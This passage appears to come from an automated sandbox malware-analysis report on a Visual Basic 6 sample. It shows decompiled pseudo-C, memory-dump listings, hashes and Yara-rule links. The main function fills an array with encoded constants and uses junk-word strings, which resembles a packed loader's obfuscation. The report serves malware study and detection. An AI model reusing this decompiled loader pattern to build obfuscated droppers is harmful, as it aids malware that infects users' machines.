				 *((intOrPtr*)(__ebx + 0x6c541393)) =  *((intOrPtr*)(__ebx + 0x6c541393)) + _t148;
				_t202 = _t148;
				asm("adc edx, [esp+ebp*2+0x10]");
				asm("outsd");
				_t150 = __ebx + 1;
				 *_t150 = __ecx;
				_t151 = _t150 + 0xea98183f;
				asm("lock add [eax], al");
				 *_t151 =  *_t151 + _t151;
				 *_t151 =  *_t151 + _t151;
				 *_t151 =  *_t151 + _t151;
				 *_t151 =  *_t151 + _t151;
				asm("outsb");
				_t152 = _t151 | 0x4f52200a;
				_t443 = _t442 - 1;
				_t210 = __ecx - 1;
				_t227 = __edi + 1;
				_push(_t216);
				_t251 = _t248 + 3;
				_t4 = _t216 + 0x2e;
				 *_t4 =  *((intOrPtr*)(_t216 + 0x2e)) + _t152;
				_push(_t443);
				if( *_t4 >= 0) {
					_t216 = _t216 + 1;
					 *_t152 =  *_t152 + _t152;
					 *_t152 =  *_t152 + _t152;
					 *_t152 =  *_t152 ^ _t152;
					asm("sbb ebp, edi");
					_push(_t216);
					_push(_t443 - 1);
					_t6 = _t152;
					_t152 = _t251;
					_t440 = _t6;
					asm("retf");
					asm("cmc");
					_t242 = __esi + 1;
					_t451 = _t440;
					 *_t152 =  *_t152 + _t152;
					 *_t152 =  *_t152 + _t152;
					 *_t152 =  *_t152 + _t152;
					 *_t152 =  *_t152 + _t152;
					 *_t152 =  *_t152 + _t152;
					 *_t152 =  *_t152 + _t152;
					 *_t152 =  *_t152 + _t152;
					 *_t152 =  *_t152 + _t152;
					 *_t152 =  *_t152 | _t152;
					_t202 = 0x93;
					_t251 = _t440 + 2;
					_push(_t216);
					_push(0x93);
					_t443 = _t451 + 2 - 1;
					_t227 = _t227 - 1;
					_push(_t443);
					 *0x54000701 =  *0x54000701 + _t210;
				}
				 *_t227 =  *_t227 + _t152;
				_t10 = _t216 + 0x61 + _t242 * 2;
				 *_t10 =  *((intOrPtr*)(_t216 + 0x61 + _t242 * 2)) + _t216;
				_t458 =  *_t10;
			}

0x00401578
0x00401578
0x0040157d
0x00401582
0x00401584
0x00401586
0x00401588
0x0040158a
0x0040158c
0x0040158d
0x0040158f
0x00401591
0x00401593
0x00401595
0x00401596
0x0040159a
0x0040159b
0x0040159c
0x0040159e
0x004015a3
0x004015a6
0x004015a8
0x004015aa
0x004015ac
0x004015af
0x004015b0
0x004015b6
0x004015b7
0x004015b8
0x004015ba
0x004015bb
0x004015bc
0x004015bc
0x004015bf
0x004015c0
0x004015c3
0x004015c4
0x004015c6
0x004015ca
0x004015cc
0x004015ce
0x004015cf
0x004015d0
0x004015d0
0x004015d0
0x004015d1
0x004015d3
0x004015d4
0x004015dd
0x00401617
0x00401619
0x0040161b
0x0040161d
0x0040161f
0x00401623
0x00401626
0x00401628
0x0040162a
0x0040162c
0x0040162f
0x00401630
0x00401631
0x00401632
0x00401633
0x00401634
0x00401635
0x00401635
0x00401637
0x00401639
0x00401639
0x00401639

APIs

#100.MSVBVM60(VB5!6%*), ref: 0040157D

Strings

VB5!6%*, xrefs: 00401578

Memory Dump Source

Source File: 00000000.00000002.1184312770.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1184298425.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1184362913.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1184369073.0000000000421000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6%*
API String ID: 1341478452-4246263594
Opcode ID: 8018c92405234386cb1549132b978c997ff4ac3fc4ac2c6b923b84454f6d7d4a
Instruction ID: a1abbddfe84d1d400a48b97eda7c525c4e8c5d1028758c779f4612a94b80043e
Opcode Fuzzy Hash: 8018c92405234386cb1549132b978c997ff4ac3fc4ac2c6b923b84454f6d7d4a
Instruction Fuzzy Hash: 5D629A3111968A8FCB03EF34CAA5D51FBB0FE3271032A5B97C4D58A092D324F56ACB56

Uniqueness

Uniqueness Score: -1.00%

Function 02993C74, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 249COMMON

Download Yara Rule

Strings

$JI, xrefs: 02993CD8

Memory Dump Source

Source File: 00000000.00000002.1185369693.0000000002980000.00000040.00000001.sdmp, Offset: 02980000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $JI
API String ID: 0-294498801
Opcode ID: 3146cfb496b0161e6b85e0f3d029dd91da5dd69e0b986be0a922bb1304ee48f9
Instruction ID: 511404b98f774f23346abe5f52034a94707f8d5f1de6f35d59c4beb8759f4dcf
Opcode Fuzzy Hash: 3146cfb496b0161e6b85e0f3d029dd91da5dd69e0b986be0a922bb1304ee48f9
Instruction Fuzzy Hash: 3E913930604745CFEF36DE2DCAA47EA37A2AF95360F55452BCC4A8B554D7308A47CB06

Uniqueness

Uniqueness Score: -1.00%

Function 0041CF24, Relevance: 323.2, APIs: 172, Strings: 12, Instructions: 1159
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E0041CF24(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char _v32;
				char _v92;
				void* _v100;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char* _t298;
				void* _t304;
				void* _t308;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t326;
				void* _t328;
				void* _t330;
				void* _t332;
				void* _t334;
				void* _t336;
				void* _t338;
				void* _t340;
				void* _t342;
				char* _t345;
				void* _t347;
				intOrPtr* _t348;
				void* _t349;
				short* _t350;
				void* _t352;
				intOrPtr* _t353;
				void* _t354;
				char _t356;
				char* _t362;
				char* _t365;
				char* _t367;
				char* _t369;
				char* _t371;
				char* _t372;
				char* _t375;
				char* _t378;
				char* _t380;
				char* _t382;
				char* _t383;
				char* _t385;
				char* _t386;
				char* _t388;
				char* _t390;
				char* _t392;
				char* _t394;
				char* _t396;
				char* _t399;
				char* _t405;
				char* _t408;
				void* _t423;
				intOrPtr* _t424;
				intOrPtr* _t425;
				intOrPtr* _t427;
				intOrPtr* _t428;
				signed int _t430;
				signed int _t431;
				void* _t432;
				void* _t434;
				intOrPtr _t435;
				intOrPtr* _t436;
				void* _t438;

				_t435 = _t434 - 0xc;
				 *[fs:0x0] = _t435;
				_t436 = _t435 - 0x90;
				_v16 = _t436;
				_v12 = 0x401290;
				_t430 = _a4;
				_v8 = _t430 & 0x00000001;
				_t431 = _t430 & 0xfffffffe;
				_a4 = _t431;
				 *((intOrPtr*)( *_t431 + 4))(_t431, __edi, __esi, __ebx,  *[fs:0x0], 0x401386, _t432);
				_t356 = 0;
				_push( &_v116);
				_v32 = 0;
				_v92 = 0;
				_v100 = 0;
				_v116 = 0;
				_v120 = 0;
				_v124 = 0;
				_v128 = 0;
				_v136 = 0;
				_v132 = 0;
				_v144 = 0;
				_v140 = 0;
				L0040154E();
				_t298 =  &_v116;
				_push(_t298);
				L00401554();
				L0040155A();
				L00401548();
				_push(0x41b3f4);
				L0040153C();
				_push(_t298);
				_push(_t298);
				L00401542();
				if(_t298 != 0) {
					_t438 =  *0x4204c8 - _t356; // 0x2a5e8b4
					if(_t438 == 0) {
						_push(0x4204c8);
						_push(0x41b418);
						L00401536();
					}
					_t424 =  *0x4204c8; // 0x2a5e8b4
					_t347 =  *((intOrPtr*)( *_t424 + 0x14))(_t424,  &_v100);
					asm("fclex");
					if(_t347 < _t356) {
						_push(0x14);
						_push(0x41b408);
						_push(_t424);
						_push(_t347);
						L00401530();
					}
					_t348 = _v100;
					_t425 = _t348;
					_t349 =  *((intOrPtr*)( *_t348 + 0x108))(_t348,  &_v120);
					asm("fclex");
					if(_t349 < _t356) {
						_push(0x108);
						_push(0x41b428);
						_push(_t425);
						_push(_t349);
						L00401530();
					}
					L0040152A();
					_push(_t356);
					_push(0x89);
					_push(1);
					_push(2);
					_t350 =  &_v32;
					_push(_t350);
					_push(2);
					_push(0x80);
					L00401524();
					_t436 = _t436 + 0x1c;
					_push(0);
					_push(_v32);
					L0040151E();
					_push(1);
					 *_t350 = 0x170b;
					_push(_v32);
					L0040151E();
					_push(2);
					 *_t350 = 0x648;
					_push(_v32);
					L0040151E();
					_push(3);
					 *_t350 = 0x4075;
					_push(_v32);
					L0040151E();
					_push(4);
					 *_t350 = 0x5d4f;
					_push(_v32);
					L0040151E();
					_push(5);
					 *_t350 = 0x484;
					_push(_v32);
					L0040151E();
					_push(6);
					 *_t350 = 0x5e80;
					_push(_v32);
					L0040151E();
					_push(7);
					 *_t350 = 0x52b8;
					_push(_v32);
					L0040151E();
					_push(8);
					 *_t350 = 0x275b;
					_push(_v32);
					L0040151E();
					_push(9);
					 *_t350 = 0x4bff;
					_push(_v32);
					L0040151E();
					_push(0xa);
					 *_t350 = 0x3f50;
					_push(_v32);
					L0040151E();
					_push(0xb);
					 *_t350 = 0x765;
					_push(_v32);
					L0040151E();
					_push(0xc);
					 *_t350 = 0x6227;
					_push(_v32);
					L0040151E();
					_push(0xd);
					 *_t350 = 0x4ed8;
					_push(_v32);
					L0040151E();
					_push(0xe);
					 *_t350 = 0xf17;
					_push(_v32);
					L0040151E();
					_push(0xf);
					 *_t350 = 0x4209;
					_push(_v32);
					L0040151E();
					_push(0x10);
					 *_t350 = 0x5c71;
					_push(_v32);
					L0040151E();
					_push(0x11);
					 *_t350 = 0x536b;
					_push(_v32);
					L0040151E();
					_push(0x12);
					 *_t350 = 0x4458;
					_push(_v32);
					L0040151E();
					_push(0x13);
					 *_t350 = 0x5635;
					_push(_v32);
					L0040151E();
					_push(0x14);
					 *_t350 = 0x6b5f;
					_push(_v32);
					L0040151E();
					_push(0x15);
					 *_t350 = 0x4bf7;
					_push(_v32);
					L0040151E();
					_push(0x16);
					 *_t350 = 0x7fd;
					_push(_v32);
					L0040151E();
					_push(0x17);
					 *_t350 = 0x4bf5;
					_push(_v32);
					L0040151E();
					_push(0x18);
					 *_t350 = 0x263c;
					_push(_v32);
					L0040151E();
					_push(0x19);
					 *_t350 = 0x1a5e;
					_push(_v32);
					L0040151E();
					_push(0x1a);
					 *_t350 = 0x1398;
					_push(_v32);
					L0040151E();
					_push(0x1b);
					 *_t350 = 0xd3d;
					_push(_v32);
					L0040151E();
					_push(0x1c);
					 *_t350 = 0x68ff;
					_push(_v32);
					L0040151E();
					_push(0x1d);
					 *_t350 = 0x665f;
					_push(_v32);
					L0040151E();
					_push(0x1e);
					 *_t350 = 0x2eb3;
					_push(_v32);
					L0040151E();
					_push(0x1f);
					 *_t350 = 0x1031;
					_push(_v32);
					L0040151E();
					_push(0x20);
					 *_t350 = 0x6b0c;
					_push(_v32);
					L0040151E();
					_push(0x21);
					 *_t350 = 0x5cd1;
					_push(_v32);
					L0040151E();
					_push(0x22);
					 *_t350 = 0x72e1;
					_push(_v32);
					L0040151E();
					_push(0x23);
					 *_t350 = 0x49f9;
					_push(_v32);
					L0040151E();
					_push(0x24);
					 *_t350 = 0x7185;
					_push(_v32);
					L0040151E();
					 *_t350 = 0x2002;
					_push(0x25);
					_push(_v32);
					L0040151E();
					_push(0x26);
					 *_t350 = 0x633c;
					_push(_v32);
					L0040151E();
					_push(0x27);
					 *_t350 = 0x2948;
					_push(_v32);
					L0040151E();
					_push(0x28);
					 *_t350 = 0xb01;
					_push(_v32);
					L0040151E();
					_push(0x29);
					 *_t350 = 0x211c;
					_push(_v32);
					L0040151E();
					_push(0x2a);
					 *_t350 = 0x6b10;
					_push(_v32);
					L0040151E();
					_push(0x2b);
					 *_t350 = 0xdb6;
					_push(_v32);
					L0040151E();
					_push(0x2c);
					 *_t350 = 0x1218;
					_push(_v32);
					L0040151E();
					_push(0x2d);
					 *_t350 = 0x219d;
					_push(_v32);
					L0040151E();
					_push(0x2e);
					 *_t350 = 0x4587;
					_push(_v32);
					L0040151E();
					_push(0x2f);
					 *_t350 = 0x1d4c;
					_push(_v32);
					L0040151E();
					_push(0x30);
					 *_t350 = 0x3951;
					_push(_v32);
					L0040151E();
					_push(0x31);
					 *_t350 = 0x26e1;
					_push(_v32);
					L0040151E();
					_push(0x32);
					 *_t350 = 0x41c7;
					_push(_v32);
					L0040151E();
					_push(0x33);
					 *_t350 = 0x21b5;
					_push(_v32);
					L0040151E();
					_push(0x34);
					 *_t350 = 0x5de5;
					_push(_v32);
					L0040151E();
					_push(0x35);
					 *_t350 = 0x2b63;
					_push(_v32);
					L0040151E();
					_push(0x36);
					 *_t350 = 0x5a62;
					_push(_v32);
					L0040151E();
					_push(0x37);
					 *_t350 = 0x6d27;
					_push(_v32);
					L0040151E();
					_push(0x38);
					 *_t350 = 0x2305;
					_push(_v32);
					L0040151E();
					 *_t350 = 0x6282;
					_push(0x39);
					_push(_v32);
					L0040151E();
					_push(0x3a);
					 *_t350 = 0x5479;
					_push(_v32);
					L0040151E();
					_push(0x3b);
					 *_t350 = 0x1d6a;
					_push(_v32);
					L0040151E();
					_push(0x3c);
					 *_t350 = 0xa04;
					_push(_v32);
					L0040151E();
					_push(0x3d);
					 *_t350 = 0x39f5;
					_push(_v32);
					L0040151E();
					_push(0x3e);
					 *_t350 = 0x7156;
					_push(_v32);
					L0040151E();
					_push(0x3f);
					 *_t350 = 0x1016;
					_push(_v32);
					L0040151E();
					_push(0x40);
					 *_t350 = 0x5dda;
					_push(_v32);
					L0040151E();
					_push(0x41);
					 *_t350 = 0x37bb;
					_push(_v32);
					L0040151E();
					_push(0x42);
					 *_t350 = 0x689a;
					_push(_v32);
					L0040151E();
					_push(0x43);
					 *_t350 = 0x75d9;
					_push(_v32);
					L0040151E();
					_push(0x44);
					 *_t350 = 0x3bf1;
					_push(_v32);
					L0040151E();
					_push(0x45);
					 *_t350 = 0x4bc7;
					_push(_v32);
					L0040151E();
					_push(0x46);
					 *_t350 = 0x546e;
					_push(_v32);
					L0040151E();
					_push(0x47);
					 *_t350 = 0x57c3;
					_push(_v32);
					L0040151E();
					_push(0x48);
					 *_t350 = 0x63c1;
					_push(_v32);
					L0040151E();
					_push(0x49);
					 *_t350 = 0x13c6;
					_push(_v32);
					L0040151E();
					_push(0x4a);
					 *_t350 = 0x5b71;
					_push(_v32);
					L0040151E();
					_push(0x4b);
					 *_t350 = 0x6e3d;
					_push(_v32);
					L0040151E();
					_push(0x4c);
					 *_t350 = 0x3044;
					_push(_v32);
					L0040151E();
					_push(0x4d);
					 *_t350 = 0x2689;
					_push(_v32);
					L0040151E();
					_push(0x4e);
					 *_t350 = 0x2cd;
					_push(_v32);
					L0040151E();
					_push(0x4f);
					 *_t350 = 0x21c9;
					_push(_v32);
					L0040151E();
					_push(0x50);
					 *_t350 = 0x2cfe;
					_push(_v32);
					L0040151E();
					_push(0x51);
					 *_t350 = 0x486a;
					_push(_v32);
					L0040151E();
					_push(0x52);
					 *_t350 = 0x5ca7;
					_push(_v32);
					L0040151E();
					_push(0x53);
					 *_t350 = 0x275f;
					_push(_v32);
					L0040151E();
					_push(0x54);
					 *_t350 = 0x3468;
					_push(_v32);
					L0040151E();
					_push(0x55);
					 *_t350 = 0x6f3;
					_push(_v32);
					L0040151E();
					_push(0x56);
					 *_t350 = 0x607a;
					_push(_v32);
					L0040151E();
					_push(0x57);
					 *_t350 = 0x30fd;
					_push(_v32);
					L0040151E();
					_push(0x58);
					 *_t350 = 0x6ac9;
					_push(_v32);
					L0040151E();
					_push(0x59);
					 *_t350 = 0x5c2b;
					_push(_v32);
					L0040151E();
					_push(0x5a);
					 *_t350 = 0x3e84;
					_push(_v32);
					L0040151E();
					_push(0x5b);
					 *_t350 = 0x6501;
					_push(_v32);
					L0040151E();
					_push(0x5c);
					 *_t350 = 0xc73;
					_push(_v32);
					L0040151E();
					_push(0x5d);
					 *_t350 = 0x6626;
					_push(_v32);
					L0040151E();
					_push(0x5e);
					 *_t350 = 0x3ca4;
					_push(_v32);
					L0040151E();
					_push(0x5f);
					 *_t350 = 0x33b8;
					_push(_v32);
					L0040151E();
					_push(0x60);
					 *_t350 = 0x2c0;
					_push(_v32);
					L0040151E();
					_push(0x61);
					 *_t350 = 0x2f48;
					_push(_v32);
					L0040151E();
					_push(0x62);
					 *_t350 = 0x25b5;
					_push(_v32);
					L0040151E();
					_push(0x63);
					 *_t350 = 0x951;
					_push(_v32);
					L0040151E();
					_push(0x64);
					 *_t350 = 0x1822;
					_push(_v32);
					L0040151E();
					_push(0x65);
					 *_t350 = 0x5f8b;
					_push(_v32);
					L0040151E();
					_push(0x66);
					 *_t350 = 0x35be;
					_push(_v32);
					L0040151E();
					_push(0x67);
					 *_t350 = 0x5dfe;
					_push(_v32);
					L0040151E();
					_push(0x68);
					 *_t350 = 0x6830;
					_push(_v32);
					L0040151E();
					_push(0x69);
					 *_t350 = 0x364f;
					_push(_v32);
					L0040151E();
					_push(0x6a);
					 *_t350 = 0x4eb6;
					_push(_v32);
					L0040151E();
					_push(0x6b);
					 *_t350 = 0x6e34;
					_push(_v32);
					L0040151E();
					_push(0x6c);
					 *_t350 = 0x2dda;
					_push(_v32);
					L0040151E();
					_push(0x6d);
					 *_t350 = 0x3555;
					_push(_v32);
					L0040151E();
					_push(0x6e);
					 *_t350 = 0x34f2;
					_push(_v32);
					L0040151E();
					_push(0x6f);
					 *_t350 = 0x4484;
					_push(_v32);
					L0040151E();
					_push(0x70);
					 *_t350 = 0x586e;
					_push(_v32);
					L0040151E();
					_push(0x71);
					 *_t350 = 0x5527;
					_push(_v32);
					L0040151E();
					_push(0x72);
					 *_t350 = 0x5e09;
					_push(_v32);
					L0040151E();
					_push(0x73);
					 *_t350 = 0x21a0;
					_push(_v32);
					L0040151E();
					_push(0x74);
					 *_t350 = 0x4a76;
					_push(_v32);
					L0040151E();
					_push(0x75);
					 *_t350 = 0x2b8d;
					_push(_v32);
					L0040151E();
					 *_t350 = 0x1ded;
					_push(0x76);
					_push(_v32);
					L0040151E();
					_push(0x77);
					 *_t350 = 0x1ac;
					_push(_v32);
					L0040151E();
					_push(0x78);
					 *_t350 = 0x3421;
					_push(_v32);
					L0040151E();
					_push(0x79);
					 *_t350 = 0x19aa;
					_push(_v32);
					L0040151E();
					_push(0x7a);
					 *_t350 = 0xffb;
					_push(_v32);
					L0040151E();
					_push(0x7b);
					 *_t350 = 0x293f;
					_push(_v32);
					L0040151E();
					_push(0x7c);
					 *_t350 = 0x56ab;
					_push(_v32);
					L0040151E();
					_push(0x7d);
					 *_t350 = 0x4d7a;
					_push(_v32);
					L0040151E();
					_push(0x7e);
					 *_t350 = 0x977;
					_push(_v32);
					L0040151E();
					_push(0x7f);
					 *_t350 = 0x7019;
					_push(_v32);
					L0040151E();
					_push(0x80);
					 *_t350 = 0x6514;
					_push(_v32);
					L0040151E();
					_push(0x81);
					 *_t350 = 0x55c8;
					_push(_v32);
					L0040151E();
					_push(0x82);
					 *_t350 = 0x5da3;
					_push(_v32);
					L0040151E();
					_push(0x83);
					 *_t350 = 0x1e5c;
					_push(_v32);
					L0040151E();
					_push(0x84);
					 *_t350 = 0x61a5;
					_push(_v32);
					L0040151E();
					_push(0x85);
					 *_t350 = 0x3305;
					_push(_v32);
					L0040151E();
					_push(0x86);
					 *_t350 = 0xad7;
					_push(_v32);
					L0040151E();
					_push(0x87);
					 *_t350 = 0x30fa;
					_push(_v32);
					L0040151E();
					_push(0x88);
					 *_t350 = 0x3944;
					_push(_v32);
					L0040151E();
					_push(0x89);
					 *_t350 = 0x25d4;
					_push(_v32);
					L0040151E();
					 *_t350 = 0xdf1;
					if( *0x4204c8 == 0) {
						_push(0x4204c8);
						_push(0x41b418);
						L00401536();
					}
					_t427 =  *0x4204c8; // 0x2a5e8b4
					_t352 =  *((intOrPtr*)( *_t427 + 0x1c))(_t427,  &_v100);
					asm("fclex");
					if(_t352 < 0) {
						_push(0x1c);
						_push(0x41b408);
						_push(_t427);
						_push(_t352);
						L00401530();
					}
					_t353 = _v100;
					_t428 = _t353;
					_t354 =  *((intOrPtr*)( *_t353 + 0x64))(_t353, 1,  &_v120);
					asm("fclex");
					if(_t354 < 0) {
						_push(0x64);
						_push(0x41b438);
						_push(_t428);
						_push(_t354);
						L00401530();
					}
					L0040152A();
					_t356 = 0;
				}
				_v136 =  *0x401280;
				_t362 =  &_v120;
				 *_t436 =  *0x40127c;
				_v120 = 0x4e1e;
				 *((intOrPtr*)( *_t431 + 0x71c))(_t431, _t362, _t362,  &_v136);
				_v136 = 0x97cd0de0;
				_v132 = 0x5af7;
				 *((intOrPtr*)( *_t431 + 0x720))(_t431,  &_v136, 0x60bb27,  &_v120);
				_v124 =  *0x401278;
				_t365 =  &_v124;
				 *_t436 =  *0x401270;
				_v120 = 0x1dc6;
				_t304 =  *((intOrPtr*)( *_t431 + 0x70c))(_t431, 0x2bec98,  &_v120, _t365, _t365, 0x43b2caa0, 0x5af8, _t365, 0x48ba04);
				if(_t304 >= _t356) {
					_t423 = 0x41b1a8;
				} else {
					_push(0x70c);
					_t423 = 0x41b1a8;
					_push(0x41b1a8);
					_push(_t431);
					_push(_t304);
					L00401530();
				}
				 *((intOrPtr*)( *_t431 + 0x724))(_t431);
				_v124 =  *0x401268;
				_t367 =  &_v128;
				_v136 =  *0x401260;
				 *_t436 =  *0x401258;
				_t369 =  &_v136;
				 *_t436 =  *0x401250;
				_t308 =  *((intOrPtr*)( *_t431 + 0x704))(_t431, _t369, _t369, _t369,  &_v124, _t367, _t367);
				if(_t308 < _t356) {
					_push(0x704);
					_push(_t423);
					_push(_t431);
					_push(_t308);
					L00401530();
				}
				_v136 =  *0x401248;
				_t371 =  &_v120;
				 *_t436 =  *0x401244;
				_v120 = 0x3fe0;
				 *((intOrPtr*)( *_t431 + 0x71c))(_t431, _t371, _t371,  &_v136);
				 *((intOrPtr*)( *_t431 + 0x724))(_t431);
				_v124 =  *0x401240;
				_t372 =  &_v124;
				 *_t436 =  *0x401238;
				_v120 = 0x6b36;
				_t314 =  *((intOrPtr*)( *_t431 + 0x70c))(_t431, 0x126e9e,  &_v120, _t372, _t372, 0x47d7dae0, 0x5b06, _t372, 0x4fc243);
				if(_t314 < 0) {
					_push(0x70c);
					_push(_t423);
					_push(_t431);
					_push(_t314);
					L00401530();
				}
				_t316 =  *((intOrPtr*)( *_t431 + 0x6f8))(_t431);
				if(_t316 < 0) {
					_push(0x6f8);
					_push(_t423);
					_push(_t431);
					_push(_t316);
					L00401530();
				}
				_v144 =  *0x401230;
				_t375 =  &_v144;
				 *_t436 =  *0x401228;
				_v136 = 0xc510a510;
				_v132 = 0x5b00;
				_t318 =  *((intOrPtr*)( *_t431 + 0x6fc))(_t431,  &_v136, _t375, _t375, _t375, L"Incited3",  &_v124);
				if(_t318 < 0) {
					_push(0x6fc);
					_push(_t423);
					_push(_t431);
					_push(_t318);
					L00401530();
				}
				_t378 =  &_v128;
				 *_t436 =  *0x401224;
				_v128 = 0x586c40;
				_v124 = 0x4ba3b9;
				_t320 =  *((intOrPtr*)( *_t431 + 0x700))(_t431, L"taljeblokkes",  &_v124, _t378, _t378, 0x437fb8, 0xcc72ea80, 0x5b04,  &_v120);
				if(_t320 < 0) {
					_push(0x700);
					_push(_t423);
					_push(_t431);
					_push(_t320);
					L00401530();
				}
				_v124 =  *0x401220;
				_t380 =  &_v128;
				_v136 =  *0x401218;
				 *_t436 =  *0x401210;
				_t382 =  &_v136;
				 *_t436 =  *0x401208;
				_t322 =  *((intOrPtr*)( *_t431 + 0x704))(_t431, _t382, _t382, _t382,  &_v124, _t380, _t380);
				if(_t322 < 0) {
					_push(0x704);
					_push(_t423);
					_push(_t431);
					_push(_t322);
					L00401530();
				}
				_v124 =  *0x401200;
				_t383 =  &_v128;
				_v136 =  *0x4011f8;
				 *_t436 =  *0x4011f0;
				_t385 =  &_v136;
				 *_t436 =  *0x4011e8;
				_t324 =  *((intOrPtr*)( *_t431 + 0x704))(_t431, _t385, _t385, _t385,  &_v124, _t383, _t383);
				if(_t324 < 0) {
					_push(0x704);
					_push(_t423);
					_push(_t431);
					_push(_t324);
					L00401530();
				}
				_v124 =  *0x4011e0;
				_t386 =  &_v128;
				_v136 =  *0x4011d8;
				 *_t436 =  *0x4011d0;
				_t388 =  &_v136;
				 *_t436 =  *0x4011c8;
				_t326 =  *((intOrPtr*)( *_t431 + 0x704))(_t431, _t388, _t388, _t388,  &_v124, _t386, _t386);
				if(_t326 < 0) {
					_push(0x704);
					_push(_t423);
					_push(_t431);
					_push(_t326);
					L00401530();
				}
				_t390 =  &_v128;
				 *_t436 =  *0x4011c4;
				_v128 = 0x779743;
				_v124 = 0x3547e6;
				_t328 =  *((intOrPtr*)( *_t431 + 0x700))(_t431, L"Sewan9",  &_v124, _t390, _t390, 0x740d26, 0x4562360, 0x5b08,  &_v120);
				if(_t328 < 0) {
					_push(0x700);
					_push(_t423);
					_push(_t431);
					_push(_t328);
					L00401530();
				}
				_v124 =  *0x4011c0;
				_t392 =  &_v128;
				_v136 =  *0x4011b8;
				_t247 =  &_v124; // 0x3547e6
				 *_t436 =  *0x4011b0;
				_t394 =  &_v136;
				 *_t436 =  *0x4011a8;
				_t330 =  *((intOrPtr*)( *_t431 + 0x704))(_t431, _t394, _t394, _t394, _t247, _t392, _t392);
				if(_t330 < 0) {
					_push(0x704);
					_push(_t423);
					_push(_t431);
					_push(_t330);
					L00401530();
				}
				_t250 =  &_v124; // 0x3547e6
				_v144 =  *0x4011a0;
				_t396 =  &_v144;
				 *_t436 =  *0x401198;
				_v136 = 0x74a79810;
				_v132 = 0x5b03;
				_t332 =  *((intOrPtr*)( *_t431 + 0x6fc))(_t431,  &_v136, _t396, _t396, _t396, L"Resultancy7", _t250);
				if(_t332 < 0) {
					_push(0x6fc);
					_push(_t423);
					_push(_t431);
					_push(_t332);
					L00401530();
				}
				_t399 =  &_v128;
				 *_t436 =  *0x401190;
				_t259 =  &_v124; // 0x3547e6
				_v128 = 0x19dcc6;
				_v124 = 0x22914a;
				_t334 =  *((intOrPtr*)( *_t431 + 0x700))(_t431, L"Sygedag5", _t259, _t399, _t399, 0x5b8832, 0xe6ccbf80, 0x5af7,  &_v120);
				if(_t334 < 0) {
					_push(0x700);
					_push(_t423);
					_push(_t431);
					_push(_t334);
					L00401530();
				}
				_v120 = 0x2f9a;
				_v128 = 0x585de3;
				_v124 = 0x363133;
				_t336 =  *((intOrPtr*)( *_t431 + 0x708))(_t431,  &_v124, L"SNUSTOBAKKENS",  &_v128, L"REPUBLIKANSKE",  &_v120);
				if(_t336 < 0) {
					_push(0x708);
					_push(_t423);
					_push(_t431);
					_push(_t336);
					L00401530();
				}
				_v144 =  *0x401188;
				_t405 =  &_v144;
				 *_t436 =  *0x401180;
				_v136 = 0x201953c0;
				_v132 = 0x5af8;
				_t338 =  *((intOrPtr*)( *_t431 + 0x6fc))(_t431,  &_v136, _t405, _t405, _t405, L"AGRONOMISTS",  &_v124);
				if(_t338 < 0) {
					_push(0x6fc);
					_push(_t423);
					_push(_t431);
					_push(_t338);
					L00401530();
				}
				_t408 =  &_v128;
				 *_t436 =  *0x40117c;
				_v128 = 0xda77b;
				_v124 = 0x74b628;
				_t340 =  *((intOrPtr*)( *_t431 + 0x700))(_t431, L"Inobscurable",  &_v124, _t408, _t408, 0x2b773e, 0xbdae3890, 0x5afc,  &_v120);
				if(_t340 < 0) {
					_push(0x700);
					_push(_t423);
					_push(_t431);
					_push(_t340);
					L00401530();
				}
				_t342 =  *((intOrPtr*)( *_t431 + 0x6f8))(_t431);
				if(_t342 < 0) {
					_push(0x6f8);
					_push(_t423);
					_push(_t431);
					_push(_t342);
					L00401530();
				}
				_v136 = 0x1f23d260;
				_v132 = 0x5b07;
				 *((intOrPtr*)( *_t431 + 0x720))(_t431,  &_v136, 0x4dfe2,  &_v120);
				_v8 = 0;
				asm("wait");
				_push(0x41defe);
				_t345 =  &_v32;
				_push(_t345);
				_push(0);
				L00401518();
				L00401512();
				return _t345;
			}

0x0041cf27
0x0041cf36
0x0041cf3d
0x0041cf46
0x0041cf49
0x0041cf50
0x0041cf58
0x0041cf5b
0x0041cf61
0x0041cf64
0x0041cf67
0x0041cf6c
0x0041cf6d
0x0041cf70
0x0041cf73
0x0041cf76
0x0041cf79
0x0041cf7c
0x0041cf7f
0x0041cf82
0x0041cf88
0x0041cf8b
0x0041cf91
0x0041cf97
0x0041cf9c
0x0041cf9f
0x0041cfa0
0x0041cfaa
0x0041cfb2
0x0041cfb7
0x0041cfbc
0x0041cfc7
0x0041cfc8
0x0041cfc9
0x0041cfd0
0x0041cfd6
0x0041cfdc
0x0041cfde
0x0041cfe3
0x0041cfe8
0x0041cfe8
0x0041cfed
0x0041cffa
0x0041cffd
0x0041d001
0x0041d003
0x0041d005
0x0041d00a
0x0041d00b
0x0041d00c
0x0041d00c
0x0041d011
0x0041d01b
0x0041d01d
0x0041d023
0x0041d027
0x0041d029
0x0041d02e
0x0041d033
0x0041d034
0x0041d035
0x0041d035
0x0041d03d
0x0041d042
0x0041d048
0x0041d049
0x0041d04b
0x0041d04d
0x0041d050
0x0041d051
0x0041d058
0x0041d059
0x0041d05e
0x0041d061
0x0041d063
0x0041d066
0x0041d06b
0x0041d06d
0x0041d072
0x0041d075
0x0041d07a
0x0041d07c
0x0041d081
0x0041d084
0x0041d089
0x0041d08b
0x0041d090
0x0041d093
0x0041d098
0x0041d09a
0x0041d09f
0x0041d0a2
0x0041d0a7
0x0041d0a9
0x0041d0ae
0x0041d0b1
0x0041d0b6
0x0041d0b8
0x0041d0bd
0x0041d0c0
0x0041d0c5
0x0041d0c7
0x0041d0cc
0x0041d0cf
0x0041d0d4
0x0041d0d6
0x0041d0db
0x0041d0de
0x0041d0e3
0x0041d0e5
0x0041d0ea
0x0041d0ed
0x0041d0f2
